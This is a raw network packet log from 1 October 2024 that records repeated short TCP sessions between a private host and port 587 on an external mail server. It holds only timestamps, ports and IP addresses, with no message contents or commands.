Oct 1, 2024 06:17:21.208808899 CEST	50429	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:21.210376024 CEST	50430	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:21.215224028 CEST	587	50430	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:21.215303898 CEST	50430	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:21.786206961 CEST	587	50430	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:21.786458015 CEST	50430	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:21.791302919 CEST	587	50430	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:21.956743002 CEST	587	50430	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:21.984340906 CEST	50430	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:21.989368916 CEST	587	50430	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:22.158236980 CEST	587	50430	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:22.161477089 CEST	50430	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:22.166332006 CEST	587	50430	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:22.340020895 CEST	587	50430	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:22.340033054 CEST	587	50430	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:22.340049982 CEST	587	50430	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:22.340058088 CEST	587	50430	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:22.340131044 CEST	50430	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:22.340131044 CEST	50430	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:22.430695057 CEST	587	50430	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:22.432013035 CEST	50430	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:22.436901093 CEST	587	50430	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:22.597604036 CEST	587	50430	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:22.606848001 CEST	50430	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:22.611722946 CEST	587	50430	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:22.772325993 CEST	587	50430	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:22.772598982 CEST	50430	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:22.777442932 CEST	587	50430	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:22.938563108 CEST	587	50430	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:22.938817024 CEST	50430	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:22.943664074 CEST	587	50430	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:23.116028070 CEST	587	50430	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:23.116226912 CEST	50430	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:23.121062994 CEST	587	50430	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:23.281286001 CEST	587	50430	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:23.281552076 CEST	50430	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:23.286418915 CEST	587	50430	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:23.474715948 CEST	587	50430	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:23.474898100 CEST	50430	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:23.479723930 CEST	587	50430	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:23.639698982 CEST	587	50430	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:23.640089035 CEST	50430	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:23.640130043 CEST	50430	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:23.640156031 CEST	50430	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:23.640199900 CEST	50430	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:23.645275116 CEST	587	50430	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:23.645283937 CEST	587	50430	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:23.645291090 CEST	587	50430	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:23.645293951 CEST	587	50430	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:23.879458904 CEST	587	50430	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:23.880027056 CEST	50430	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:23.884887934 CEST	587	50430	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:24.045721054 CEST	587	50430	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:24.046097040 CEST	50430	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:24.046808004 CEST	50431	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:24.053147078 CEST	587	50431	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:24.053224087 CEST	50431	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:24.645090103 CEST	587	50431	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:24.645205975 CEST	50431	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:24.651155949 CEST	587	50431	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:24.827496052 CEST	587	50431	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:24.827645063 CEST	50431	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:24.832469940 CEST	587	50431	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:25.009661913 CEST	587	50431	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:25.010128021 CEST	50431	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:25.015033960 CEST	587	50431	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:25.231070995 CEST	587	50431	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:25.231086969 CEST	587	50431	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:25.231097937 CEST	587	50431	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:25.231187105 CEST	50431	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:25.241178036 CEST	587	50431	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:25.241189003 CEST	587	50431	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:25.241246939 CEST	50431	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:25.242909908 CEST	50431	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:25.247670889 CEST	587	50431	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:25.435215950 CEST	587	50431	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:25.436110973 CEST	50431	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:25.440912008 CEST	587	50431	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:25.915129900 CEST	587	50431	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:25.915369034 CEST	50431	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:25.920342922 CEST	587	50431	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:26.096390009 CEST	587	50431	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:26.096865892 CEST	50431	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:26.101672888 CEST	587	50431	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:26.291831970 CEST	587	50431	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:26.291968107 CEST	50431	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:26.296766996 CEST	587	50431	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:26.470185041 CEST	587	50431	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:26.470468998 CEST	50431	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:26.475229025 CEST	587	50431	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:26.676568031 CEST	587	50431	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:26.676840067 CEST	50431	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:26.681647062 CEST	587	50431	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:26.858740091 CEST	587	50431	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:26.859129906 CEST	50431	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:26.859131098 CEST	50431	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:26.859131098 CEST	50431	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:26.859131098 CEST	50431	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:26.864017963 CEST	587	50431	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:26.864053011 CEST	587	50431	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:26.864089966 CEST	587	50431	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:26.864103079 CEST	587	50431	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:27.468643904 CEST	587	50431	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:27.469157934 CEST	50431	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:27.473984957 CEST	587	50431	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:27.655561924 CEST	587	50431	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:27.655879974 CEST	50431	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:27.656764984 CEST	50432	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:27.661515951 CEST	587	50432	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:27.661607981 CEST	50432	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:28.214622021 CEST	587	50432	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:28.214761972 CEST	50432	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:28.219577074 CEST	587	50432	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:28.254498005 CEST	50432	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:28.258042097 CEST	50433	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:28.259763956 CEST	587	50432	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:28.259835958 CEST	50432	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:28.262923002 CEST	587	50433	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:28.263014078 CEST	50433	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:28.839936972 CEST	587	50433	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:28.840218067 CEST	50433	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:28.845042944 CEST	587	50433	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:29.004432917 CEST	587	50433	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:29.007627010 CEST	50433	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:29.012444973 CEST	587	50433	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:29.175683022 CEST	587	50433	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:29.176141024 CEST	50433	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:29.181041956 CEST	587	50433	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:29.389667988 CEST	587	50433	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:29.389681101 CEST	587	50433	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:29.389692068 CEST	587	50433	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:29.389734983 CEST	50433	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:29.397721052 CEST	587	50433	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:29.397768974 CEST	50433	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:29.397794962 CEST	587	50433	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:29.399461031 CEST	50433	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:29.404293060 CEST	587	50433	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:29.578195095 CEST	587	50433	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:29.579058886 CEST	50433	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:29.583892107 CEST	587	50433	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:29.743751049 CEST	587	50433	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:29.744029999 CEST	50433	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:29.748836994 CEST	587	50433	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:29.911132097 CEST	587	50433	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:29.911377907 CEST	50433	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:29.916306973 CEST	587	50433	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:30.090984106 CEST	587	50433	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:30.091267109 CEST	50433	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:30.096108913 CEST	587	50433	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:30.258174896 CEST	587	50433	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:30.258392096 CEST	50433	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:30.263220072 CEST	587	50433	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:30.444245100 CEST	587	50433	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:30.444447994 CEST	50433	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:30.449254990 CEST	587	50433	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:30.609570980 CEST	587	50433	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:30.609837055 CEST	50433	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:30.609894991 CEST	50433	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:30.609927893 CEST	50433	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:30.609956026 CEST	50433	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:30.614639997 CEST	587	50433	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:30.614656925 CEST	587	50433	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:30.614835978 CEST	587	50433	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:30.614850998 CEST	587	50433	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:30.848248959 CEST	587	50433	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:30.848769903 CEST	50433	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:30.853652954 CEST	587	50433	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:31.014058113 CEST	587	50433	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:31.014432907 CEST	50433	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:31.015480042 CEST	50434	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:31.020292044 CEST	587	50434	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:31.020376921 CEST	50434	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:31.590662956 CEST	587	50434	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:31.590854883 CEST	50434	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:31.595714092 CEST	587	50434	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:31.769846916 CEST	587	50434	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:31.769989967 CEST	50434	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:31.774971962 CEST	587	50434	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:31.954678059 CEST	587	50434	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:31.955050945 CEST	50434	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:31.959903955 CEST	587	50434	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:32.156730890 CEST	587	50434	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:32.156742096 CEST	587	50434	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:32.156765938 CEST	587	50434	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:32.156781912 CEST	587	50434	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:32.156831026 CEST	50434	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:32.156905890 CEST	50434	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:32.243453026 CEST	587	50434	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:32.245039940 CEST	50434	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:32.249875069 CEST	587	50434	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:32.425576925 CEST	587	50434	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:32.428196907 CEST	50434	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:32.432986975 CEST	587	50434	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:32.608516932 CEST	587	50434	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:32.608800888 CEST	50434	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:32.613607883 CEST	587	50434	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:32.797532082 CEST	587	50434	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:32.797976971 CEST	50434	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:32.802939892 CEST	587	50434	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:32.996325970 CEST	587	50434	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:32.996608973 CEST	50434	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:33.001501083 CEST	587	50434	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:33.181595087 CEST	587	50434	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:33.181747913 CEST	50434	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:33.186649084 CEST	587	50434	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:33.378547907 CEST	587	50434	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:33.378712893 CEST	50434	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:33.383670092 CEST	587	50434	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:33.869738102 CEST	587	50434	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:33.870116949 CEST	50434	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:33.870117903 CEST	50434	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:33.870117903 CEST	50434	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:33.870117903 CEST	50434	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:33.874972105 CEST	587	50434	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:33.874982119 CEST	587	50434	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:33.875068903 CEST	587	50434	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:33.875077009 CEST	587	50434	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:33.958904982 CEST	50435	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:33.958910942 CEST	50434	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:33.964061975 CEST	587	50435	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:33.964169979 CEST	587	50434	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:33.967705011 CEST	50435	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:33.967708111 CEST	50434	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:34.527842045 CEST	587	50435	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:34.528125048 CEST	50435	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:34.532898903 CEST	587	50435	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:34.691668034 CEST	587	50435	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:34.692236900 CEST	50435	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:34.696999073 CEST	587	50435	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:34.857950926 CEST	587	50435	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:34.874392986 CEST	50435	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:34.879300117 CEST	587	50435	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:35.062592983 CEST	587	50435	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:35.062609911 CEST	587	50435	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:35.062619925 CEST	587	50435	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:35.062632084 CEST	587	50435	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:35.062639952 CEST	587	50435	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:35.062680960 CEST	50435	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:35.113588095 CEST	50435	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:35.151210070 CEST	587	50435	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:35.158144951 CEST	50435	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:35.162940979 CEST	587	50435	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:35.320228100 CEST	587	50435	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:35.321156979 CEST	50435	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:35.326036930 CEST	587	50435	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:35.481621981 CEST	587	50435	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:35.481801033 CEST	50435	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:35.486747026 CEST	587	50435	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:35.658659935 CEST	587	50435	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:35.658917904 CEST	50435	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:35.663697958 CEST	587	50435	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:35.830683947 CEST	587	50435	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:35.830984116 CEST	50435	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:35.836571932 CEST	587	50435	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:35.992600918 CEST	587	50435	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:35.999732971 CEST	50435	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:36.012115955 CEST	587	50435	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:36.180164099 CEST	587	50435	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:36.187592983 CEST	50435	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:36.192424059 CEST	587	50435	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:36.354579926 CEST	587	50435	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:36.354876041 CEST	50435	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:36.354959011 CEST	50435	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:36.355000019 CEST	50435	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:36.355000019 CEST	50435	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:36.359765053 CEST	587	50435	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:36.359852076 CEST	587	50435	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:36.359855890 CEST	587	50435	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:36.591542959 CEST	587	50435	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:36.592343092 CEST	50435	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:36.597224951 CEST	587	50435	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:36.756098032 CEST	587	50435	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:36.756725073 CEST	50435	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:36.759546041 CEST	50436	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:36.764441967 CEST	587	50436	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:36.764596939 CEST	50436	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:37.318608999 CEST	587	50436	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:37.318746090 CEST	50436	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:37.323575974 CEST	587	50436	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:37.480022907 CEST	587	50436	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:37.493891954 CEST	50436	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:37.498675108 CEST	587	50436	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:37.654583931 CEST	587	50436	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:37.658883095 CEST	50436	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:37.663686037 CEST	587	50436	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:37.843300104 CEST	587	50436	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:37.843318939 CEST	587	50436	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:37.843329906 CEST	587	50436	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:37.843339920 CEST	587	50436	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:37.843374014 CEST	50436	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:37.843444109 CEST	50436	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:37.855204105 CEST	587	50436	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:37.855269909 CEST	587	50436	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:37.855313063 CEST	50436	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:37.857551098 CEST	50436	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:37.862394094 CEST	587	50436	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:38.018429041 CEST	587	50436	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:38.019238949 CEST	50436	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:38.024122000 CEST	587	50436	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:38.177793980 CEST	587	50436	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:38.179868937 CEST	50436	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:38.184721947 CEST	587	50436	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:38.341373920 CEST	587	50436	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:38.341717958 CEST	50436	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:38.346695900 CEST	587	50436	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:38.520534039 CEST	587	50436	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:38.523669958 CEST	50436	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:38.528558969 CEST	587	50436	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:38.684879065 CEST	587	50436	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:38.685117006 CEST	50436	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:38.690030098 CEST	587	50436	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:38.878942013 CEST	587	50436	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:38.879266024 CEST	50436	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:38.884195089 CEST	587	50436	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:39.038281918 CEST	587	50436	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:39.038584948 CEST	50436	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:39.038631916 CEST	50436	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:39.038731098 CEST	50436	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:39.038731098 CEST	50436	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:39.043824911 CEST	587	50436	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:39.043860912 CEST	587	50436	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:39.285844088 CEST	587	50436	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:39.286617994 CEST	50436	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:39.291464090 CEST	587	50436	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:39.455782890 CEST	587	50436	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:39.456172943 CEST	50436	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:39.456887960 CEST	50437	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:39.461708069 CEST	587	50437	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:39.461771965 CEST	50437	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:40.027559996 CEST	587	50437	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:40.027712107 CEST	50437	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:40.032530069 CEST	587	50437	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:40.187489986 CEST	587	50437	198.54.114.247	192.168.2.4
